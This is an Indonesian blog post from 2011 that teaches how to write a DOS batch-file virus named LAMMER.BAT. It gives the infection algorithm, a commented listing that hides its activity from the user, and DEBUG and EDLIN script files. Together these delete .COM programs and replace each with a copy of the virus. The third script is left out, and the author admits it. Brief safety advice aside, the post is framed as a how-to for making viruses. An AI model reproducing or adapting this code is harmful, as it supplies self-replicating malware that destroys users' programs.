selamat datang

sehubungan dengan banyaknya permintaan tools dan ebook dalam bentuk cd,mohon mengganti biaya produksi dan kirimnya,sebab kami bukan milyuner yang kaya raya......................

Minggu, 22 Mei 2011

about virus1

Virus adalah penyakit yang tidak bisa di berantas secara tuntas sejak dahulu. Kini kita akan melihat teknik bagaimana virus tersebut bisa dibuat.



Perhatian
Program dibawah ini dapat menulari sistem, tetapi dengan cara yang cepat dapat diketahui.Berikut ini adalah saran – saran yang harus selalu di perhatikan pada waktu bereksperimen dengan virus:

1. Bekerjalah hanya pada file cadangan (backup).
2. Cegahlah jangan sampai virus – virus atau program –program yang sudah ditulari jangan ketangan orang lain (tertular).
3. Setelah percobaan, hapuskan semua program – program yang telah ditulari.
4. Hendaknya hard disk dilindungi terhadap penulisan yang tidak diharapkan, dengan menggunakan instruksi DOS, ASSIGN.

Ketiklah instruksi berikut ini dibelakang prompt DOS:
A> assign c=a (disket master DOS pada drive A)
Dengan jalan ini maka semua tindakan yang ditujukan kepada hard disk, diarahkan ke drive A. Perlindungan ini tidak benar – benar rapat, tetapi dapat mencegah sebagian besar virus – virus yang menyerang hard disk .Untuk mendapatkan kembali keadaan normal, tuliskan : “assign c=c” sementaradisket master DOS berada di drive A. Kalau syarat diatas dipatuhi pada waktu anda bekerja dengan program virus, maka tak akan ada bahaya karena penularan –penularan yang tidak disengaja.

1. VIRUS KOMPUTER DALAM BATCHFILE

Sebagai awal dalam mempelajari pemrograman virus komputer , berikut ini akan ditampilkan virus komputer dalam bentuk batchfile.Virus ini memanfaatkan fasilitas dari DOS, dengan memanggil instruksi – instruksi file internal dan eksternal. Instruksi – instruksi file internal (instruksi yang merupakan “bagian dalam” dari modul sistem operasi tempat modul tersebut dipindahkan ke memori-internal/RAM pada saat boot) digunakan sesuai dengan hukum-instruksi dalam batchfile.Untuk instruksi – instruksi file eksternal seperti DEBUG dan EDLIN, harus disediakan file-file yang diperlukan.Disamping itu virus ini juga memanfaatkan pemilihan arah bagi operasi masukan dan keluaran dalam PC-DOS(I/O redirection).Virus in hanya menyerang file – file yang berekstensi COM.

Seperti yang telah kita ketahui bersama bahwa sebuah virus mempunyai 5 buah kemampuan, yaitu :kemampuan mendapatkan informasi, kemampuan memeriksa program, kemampuan menggandakan diri dan menularkan, kemampuan menyembunyikan diri. Dari kelima buah kemampuan tersebut hanya 2 kemampuan yang dimiliki oleh virus batchfile yang akan saya bahas disini, yaitu kemampuan mendapatkan informasi serta kemampuan menggandakan diri dan menulari file yang lain. Meskipun demikian, virus ini sudah dapat bekerja karena kedua kemampuan tersebut merupakan inti dari sebuah virus komputer, sedangkan kemapuan yang lain hanyalah tambahan.

Bila ditinjau dari jenisnya, maka virus bacthfile ini adalah virus yang bersifat menumpangi program yang ditularinya. Dengan demikian suatu program yang telah tertular virus ini menjadi tidak dapat dipakai lagi, karena telah dirusak oleh virus.

2. ALGORITMA

Misalkan virus bacthfile tersebut bernama LAMMER.BAT, maka LAMMER.BAT harus mengandung runtun isntruksi yang mampu melakukan kegiatan – kegiatan sbb:

1. Mencari file COM yang pertama dalam directory (kalau ada)
2. Menghapus file tersebut
3. Menyalin (copy) file LAMMER.BAT ke file dengan nama seperti nama file yang tadi dihapus, tapi dengan ekstensi BAT

Dengan demikian sesudah penularan, isi dari file yang ditulari adalah persis sama dengan file LAMMER.BAT.Sehingga pemanggilan terhadap file yang tertular mempunyai akibat sama dengan memanggil file LAMMER.BAT.

3. BAGAN ALIR




4. Listing Program

Batchfile dibawah ini merupakan implementasi dari alir bagan diatas.

NAMA FILE: LAMMER.BAT

Echo off --> (Keluaran ke layar dihadang, sehingga pekerjaan yang dilakukan oleh batchfile tidak tampak oleh pemakai)

Ctty nul ----> (Masukan dan keluaran diubah arahnya ke NUL -device)

Dir *.com/w.daftar ---> (Nama dari semua file dengan ekstensi .Com dalam directory yang aktif ditulis dalam file DAFTAR.pilihan “/w” akan membuat tanggal dan panjangn file tidak ditampilkan)

Edlin daftar<\1 ---> (EDLIN mendapat masukan dari perintah-perintah dalam file instruksi “1” untuk menyunting file DAFTAR)

Debug daftar<\2 ---?(DEBUG memanggil DAFTAR dan melaksanakan perintah-perintah dari file 2, untuk membuat bacthfile PERINTAH.BAT)

Edlin perintah.bat<\3 ---?(Text editor EDLIN memanggil file PERINTAH.BAT dan file instruksi ketiga)

Del daftar.* --->(File DAFTAR DAN DAFTAR.BAK dihapus)

Del perintah.bak --->(File PERINTAH.BAK dihapus)

Ctty con ---->(Masukan dan Keluaran kembali ke keyboard dan layar, tetapi layar tetap kosong (echo off)

Perintah --> (File PERINTAH.BAT dipanggil.Bila virus sudah menulari file ASSIGN.COM, maka PERINTAH.BAT berisi sbb:
DEL ASSIGN.COM
COPY \LAMMER.BAT)



3 buah file instruksi dengan nama “1”, “2” dan “3” (tanpa ekstensi) berhubungan dengan file batchfile :LAMMER.BAT diatas,sbb:

NAMA FILE : 1

1,4d
e

NAMA FILE : 2

M100,10b,f000
E108 “.bat”
M100,10b,f010
E100”DEL”
Mf000,f00b,104
E10c 2e
E110 0d,0a
Mf010,f020,11f
E112 “COPY \LAMMER.BAT”
E12b 0d,0a
Rcx
2c
nperintah.bat
w
q






NAMA FILE 3:

Maaf file instruksi ketiga tidak dapat ditulis di bagian ini karena mengandung dua kali Ctrl-Z (hex 1Ah) dan Saya sendiri udah capek nulisnya hehehehe….maklum blom minum jamu kuat :) hehehe…hehe
Gunakan kreatifitas anda sebagai programmer :) :) :)

Demikianlah beberapa informasi pengetahuan ttg virus komputer dalam file batchfile.Semoga apa yang saya sampaikan disini dapat berguna bagi teman – teman yang pengen memahami teknik pemrograman virus dan pembuatannya.
Dan jangan lupa untuk tetap Menantikan Artikel saya selanjutnya kekeee……kekeke :) :) :)

Tidak ada komentar:

Posting Komentar